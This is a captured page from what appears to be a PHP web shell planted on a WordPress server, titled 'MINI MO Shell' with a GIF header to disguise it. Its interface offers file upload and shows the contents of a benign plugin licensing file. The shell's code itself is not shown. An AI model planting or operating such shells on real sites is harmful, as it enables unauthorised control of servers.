GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/licensing/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/licensing/functions.php

<?php
namespace Breakdance\Licensing;

use function Breakdance\Data\get_global_option;
use function Breakdance\Data\set_global_option;

/**
 * @param bool $should_receive
 * @return void
 */
function save_option_receive_beta_updates($should_receive)
{
    set_global_option('receive_beta_updates', (bool)$should_receive);
}

/**
 * @return bool
 */
function get_option_receive_beta_updates()
{
    return (bool)get_global_option('receive_beta_updates');
}

OHA YOOO - Tarih: 2026-08-04 00:03:15